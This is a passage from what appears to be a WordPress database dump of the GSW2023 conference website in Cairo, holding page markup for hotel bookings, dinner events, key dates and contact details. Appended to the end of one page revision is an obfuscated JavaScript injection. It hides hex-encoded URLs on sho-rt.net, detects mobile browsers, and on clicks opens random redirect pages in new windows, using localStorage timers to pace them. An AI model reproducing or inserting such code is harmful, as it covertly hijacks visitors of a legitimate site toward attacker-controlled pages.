wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-16 02:57:57','2023-08-16 02:57:57','',3066,'https://gsw2023.com/?p=5276',0,'revision','',0),
(5277,1,'2023-08-16 02:58:39','2023-08-16 02:58:39','<p>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1692154570478{margin-top: 75px !important;}\"]</p>\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Under the Auspices of </strong></span><br />\n<span style=\"font-size: 18pt;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\n<span style=\"font-size: 18pt;\"><strong>Prime Minister of the </strong></span><span style=\"font-size: 18pt;\"><strong>Arab Republic of Egypt</strong></span></h6>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"5267\" img_size=\"250x250\" alignment=\"right\" style=\"vc_box_rounded\"][/vc_column][/vc_row][vc_separator style=\"shadow\" 